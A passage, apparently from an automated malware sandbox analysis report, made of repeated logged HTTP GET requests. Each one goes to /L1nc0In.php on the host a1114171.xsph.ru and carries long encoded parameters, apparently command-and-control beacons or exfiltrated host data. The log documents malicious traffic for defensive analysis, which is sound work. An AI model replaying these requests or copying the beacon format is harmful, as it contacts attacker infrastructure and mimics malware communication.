EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=QX9JiI6ISZxgTM3IGOwUWZwIzNwkzYwgTM2E2MkJzN4gDOiNTNlJCLiQzM5ImMmJWZyYTYyMTOyEGM5QGZkVzN4ETN4YjMmFjY4YWMkdjNjVmI6IiMxEWYjZWZmZ2YjJzMkVTMwcTNkZmM0YTMyIGNkRmZjJCLiYGN2UmM4IWM1czY5czYjFTMmdzMkN2MjRzNwQmZyQGOyAzM2IGO0kjI6ICOjJmNmdDZ3MWZjBjN5EGOjZWZ3MDM1ITZhJmYzEDNxIyes0nIRZWOKl3Y0JUeNNTRqlkNJN0T0UlaZ1mSE5keJJTWsZkeOlmTq10aS1mTo50RahXWUp1akRlWrpVbZpmWUp1djpmWwk0Ral2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=d1nIVtGVQJFMJJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIyIjNwQjZykTOmVmZilDZmF2N2ITZldjZ1gzMyImZmJGZlFTM3gTYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&c0fb3202b93362b1726aed31ca126308=QX9JSUNJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlF2YhFmZ2EmZwYGNmNTYiRDZzI2MwUGZmJTMwIjYlBTMmJjYmRWOhJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUS0UFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSyUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSyUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1d